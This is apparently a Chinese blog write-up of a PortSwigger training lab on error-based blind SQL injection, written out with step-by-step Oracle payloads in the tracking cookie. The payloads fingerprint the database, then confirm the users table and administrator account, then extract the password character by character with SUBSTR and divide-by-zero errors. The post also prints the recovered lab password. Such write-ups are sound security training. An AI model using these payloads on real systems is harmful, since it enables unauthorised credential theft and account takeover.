portswigger lab:SQLI 盲注:利用conditional error

最新推荐文章于 2023-12-22 14:23:11 发布
最新推荐文章于 2023-12-22 14:23:11 发布
阅读量312 收藏
点赞数
分类专栏: Security 文章标签: sql 数据库 java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/quandaquan/article/details/126395979
版权

This lab contains a blind SQL injection vulnerability. The application uses a tracking cookie for analytics, and performs an SQL query containing the value of the submitted cookie.

The results of the SQL query are not returned, and the application does not respond any differently based on whether the query returns any rows. If the SQL query causes an error, then the application returns a custom error message.

The database contains a different table called users, with columns called username and password. You need to exploit the blind SQL injection vulnerability to find out the password of the administrator user.

To solve the lab, log in as the administrator user.

分析:

知道注入点是tracking cookie,要利用error 来判断

其实跟上一篇底层是一样的,上一篇是利用是否有welcome back来判断,

但是这个场景中呢,没有这个可显示的不同,所以要根据是否报错来判断这个问答回答的是“yes” or “no” 当然构造问题也很重要。

1. 先看下是啥datebase

TrackingId=xxx'||(SELECT '')||'

报错了,

再试试TrackingId=xxx'||(SELECT '' FROM dual)||'

 

说明是oracle数据库。因为oracle select from 后面得有table,不知道table名就有dual 一个dummy的table

“||”就是拼接字符串

 2. 确认是否存在users这个表

TrackingId=xxx'||(SELECT '' FROM users WHERE ROWNUM = 1)||'

 没有error,说明users 表存在的。

逻辑就是这样的。问是不是啊?

  • 返回200=是
  • 返回非200=否

注意where rownum=1 不能省,当然可以换改成2,5,100.

省了之后返回多行就报错了。

3. 确定administrator是否存在

TrackingId=xxx'||(SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'

sql是先执行WHERE username='administrator',所以如果不存在的话,前面就不执行, 返回就200了

只有administrator存在的时候,才有机会进到case里,我们case when 1=1,为真,所以到了0除,会报错,

  • 此处,administrator存在,那么error
  • 不存在,那么200

 4. 确定密码长度

'||(SELECT CASE WHEN LENGTH(password)>1 THEN to_char(1/0) ELSE '' END FROM users WHERE username='administrator')||'

这个query就是说,如果password 大于1, 就报错,否则200

结果当然是大于1了。接下来还是请出不速之客(sqli blind injection盲注,以马冬梅为例_犬大犬小的博客-CSDN博客

 密码长度还是20

5. 找出密码

'||(SELECT CASE WHEN SUBSTR(password,1,1)='a' THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'

还是从第一位开始遍历,20圈,找到返回error的

直接把返回500的都拎出来

gkjofrhpb77li8nod5ge

 

总结,

还是那个马红梅那个游戏的逻辑。回答的方式变成了返回200 or 500

一步步构造这个“问答”

几个知识点

1. 如果判断数据库类型,可以参考SQL injection cheat sheet | Web Security Academy (portswigger.net)

2. SQL 的if else

case when xx then xx else xx end

SELECT CASE WHEN SUBSTR(password,1,1)='a' THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')

如果 where肯定为真,就把要问的问题放到when中,then 来个出错的,这样就可以根据返回值判断when是否为真了

3 sql是先执行from后面语句的!如果administrator不存在,就不执行前面了,也不会报错了,所以要用when then else end来一过

参考

sqli blind injection盲注,以马冬梅为例_犬大犬小的博客-CSDN博客 

就这吧,以上!

 

犬大犬小
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
protSwigger下的SQL注入系列--Lab1(检索隐藏的数据)
weixin_44746974的博客
10-23 477
protSwigger下的SQL注入系列–Lab1(检索隐藏的数据) 在不同情况下会出现各种SQL注入漏洞,攻击和技术。一些常见的SQL注入示例包括: 检索隐藏的数据,您可以在其中修改SQL查询以返回其他结果。 颠覆应用程序逻辑,您可以在其中更改查询以干扰应用程序的逻辑。 UNION攻击,您可以在其中从不同的数据库表中检索数据。 检查数据库,您可以在其中提取有关数据库版本和结构的信息。 盲SQL注入,其中您控制的查询结果未在应用程序的响应中返回。 第一步:进入实验,判断是否存在注入点: 1、2 开始
Lab: Blind SQL injection with conditional errors带条件错误的盲注靶场复盘
Zeker62的博客
08-18 447
靶场要求: This lab contains a blind SQL injection vulnerability. The application uses a tracking cookie for analytics, and performs an SQL query containing the value of the submitted cookie. The results of the SQL query are not returned, and the application do
portswigger网站sqli lab答案
12-03 613
burp网站sqli lab答案
sql注入-盲注
weixin_36591264的博客
12-06 3081
学习内容: 布尔盲注 时间盲注 报错盲注 SQL注入-盲注学习内容:前言一、基于布尔盲注二、基于时间盲注三、基于报错盲注 前言 何为盲注盲注就是在 sql 注入过程中,sql 语句执行的选择后,选择的数据不能回显 到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个过程称之为盲注。从 background-1 中,我们可以知道盲注分为三类 •基于布尔 SQL 盲注 •基于时间的 SQL 盲注 •基于报错的 SQL 盲注 注:使用靶场:sqli-labs 靶场下载地址:https
5-10sqli盲注原理及基于boolean盲注的案例演示
山兔的博客
05-20 584
Sql-Inject漏洞-盲注  什么是盲注以及常见的盲注类型  基于boolean(true or false)的盲注测试  基于time的盲注测试 什么是盲注 在有些情况下,后台使用了错误消息屏蔽方法(比如@)屏蔽了报错,或者标准输出,输出到了前面,也就是说,并不会向我们之前的测试案例一样,sql注入的语法报错,给输出到了前端。 同时,当我们构造payload输进去的时候,它也并不会把多余的内容,在页面上进行显示,此时无法在根据报错信息来进行注入的判断。 这种情况下的注入,称为“盲注” 根据表现形
buby:PortSwigger Burp Suite 的 BurpExtender 接口的 JRuby 实现
06-08
说明: Buby 是 JRuby 与 PortSwigger 流行的商业 Web 安全测试工具 Burp Suite 的混搭。 Burp 由使用 BurpExtender API 的 Java 扩展或使用新的嵌入式 JRuby 支持的 JRuby BurpExtender 实现驱动并绑定到 JRuby。 ...
portswigger证书
11-19
portswigger证书,der格式、pem格式,转化好的,直接可以用哦! Android设备抓包必备哦!
attack-hub:攻击中心
04-04
0x00 本人用过的较好的web安全学习资源: https://portswigger.net/web-security (包含原理讲解和动手实验,原理讲解的很清楚,免费) https://www.w3schools.com/ (包含知识点讲解和动手实验,知识点讲解的很...
BExtension:Burp 代理 http 的扩展
06-28
Burp Suite是一款由PortSwigger公司开发的强大网络应用程序安全测试工具,主要用于web应用安全测试。它集成了多种功能,包括拦截HTTP/S流量、扫描漏洞、修改请求和响应等,是渗透测试人员的常用工具。 在Burp Suite...
collaborator:BurpSuite StandardPrivate合作者库
05-24
BurpSuite 是一款由 PortSwigger 开发的流行网络安全工具,主要用于Web应用安全测试。"Standard" 和 "Private" 可能指的是 BurpSuite 的不同版本,其中 Standard 版本是基础版,而 Private 版可能提供了更多的高级...
5-11sqli盲注-base on time的盲注案例演示
山兔的博客
05-22 250
什么是盲注-based time 如果说基于boolean的盲注在页面上还可以看到0 or 1的回显,可以判断后端执行的情况,那么基于time的盲注完全就啥都看不到了! 但还有一个条件,就是“时间”,通过特定的输入,判断后台执行的时间,从而确认注入! 常用的Teat Payload: kobe' and sleep(5)# 我们回到pikachu上面来,我们输入单引号 这个地方,没有报错,我们输入kobe 返回得是一样的结果,我们输入一个恶意的payload, kobe' and 1=1# 我们看一
Lab: Blind SQL injection with conditional responses PRACTITIONER 带条件响应的SQL盲注靶场复盘
Zeker62的博客
08-18 561
靶场完成目标: This lab contains a blind SQL injection vulnerability. The application uses a tracking cookie for analytics, and performs an SQL query containing the value of the submitted cookie. The results of the SQL query are not returned, and no error message
dvwa mysql_error()_DVWA sqli浅析
weixin_39639600的博客
02-15 106
0x00首先简单介绍一下DVWA。Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable.简单来说就是一个web漏洞实验环境,可以用来练习web向各种漏洞的利用。第一次写专栏,这一篇试试水,知乎上大牛很多,如果有写的不对的地方,还请各位大牛指导!0x01环境怎么安装就不啰嗦了,可以去...
BurpSuit官方实验室之SQL注入
tpaer的博客
11-13 5377
BurpSuit官方实验室靶场-SQL注入通关记录。
Portswigger sql注入
最新发布
arcuied
12-22 932
这里靶场指出 不要随意的测试 or 1=1 在update 和 delete下可能会增删数据。在union的第二个参数可以注出来 可以分两次读username 和 password。不知道是oracle还是SqlServer还是postgresql的语法。administrator登录 使用的Oracle数据库。需求: administrator登录。需求:获取Oracle数据的数据库版本。还要注意的是Oracle数据库的特性。需求:administrator登录。需求:返回包含null的值。
SQL盲注
weixin_59872639的博客
02-18 2443
盲注SQL注入过程中,SQL语句执行后,选择的数据不能回显到前端页面,此时需要利用一些方法进行判断或者尝试,这个过程称之为盲注。 在盲注中,攻击者根据其返回页面的不同来判断信息(可能是页面内容的不同,也可以是响应时间不同)。一般情况下,盲注可分为两类: 基于布尔的盲注(Boolean based) 基于时间的盲注(Time based) 基于布尔的盲注 某些场合下,页面返回的结果只有两种(正常或错误) 。通过构造SQL判断语句,查看页面的返回结果(True or False)来判断哪些S
PortSwigger Academy | Access control : 访问控制
水榭山寺花烂漫,凤凰集外雁归来。敢与云峰争秀色,妙雨莲花九重开。
01-27 1098
文章目录总结访问控制是什么?垂直访问控制水平访问控制上下文相关的访问控制损坏的访问控制示例垂直特权升级未受保护的功能Lab: Unprotected admin functionalityLab: Unprotected admin functionality with unpredictable URL基于参数的访问控制方法Lab: User role controlled by request parameterLab: User role can be modified in user profile
PortSwigger Academy | Authentication : 身份认证
水榭山寺花烂漫,凤凰集外雁归来。敢与云峰争秀色,妙雨莲花九重开。
01-14 2339
文章目录什么是身份验证?身份验证和授权有什么区别?身份验证漏洞是如何产生的?易受攻击的身份验证有何影响?身份验证机制中的漏洞 ↓第三方身份验证机制中的漏洞防止对您自己的身份验证机制的攻击 ↓如何保护身份验证机制注意用户凭据不要指望用户来保证安全防止用户名枚举实施强大的暴力破解保护反复检查验证逻辑别忘了补充功能实施适当的多因素身份验证 在本节中,我们将介绍一些网站使用的最常见的身份验证机制,并讨论其中的潜在漏洞。我们将重点介绍不同身份验证机制中的固有漏洞,以及由于身份验证的不恰当实现而引入的一些典型漏洞。最
sql盲注 解决_SQL 盲注漏洞
weixin_39943992的博客
12-19 1150
原文来自:PORTSWIGGER WEB SECURITY >> Web Security Academy>>SQL injection >>Blind SQL injection翻译完毕...本部分,我们将描述什么是 SQL 盲注漏洞,并解释发现和利用 SQL 盲注漏洞的多种技术。什么是 SQL 盲注?当应用程序容易收到 SQL 注入,但其 HTTP 响应不包...
BurpSuite深度解析:Intruder模块详解
BurpSuite是一款强大的Web应用安全测试工具,由PortSwigger公司开发。该工具集成了多个模块,旨在帮助安全专家和渗透测试人员高效地发现并利用Web应用程序的漏洞。以下是各主要模块的详细说明: 1. **Proxy模块**:...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值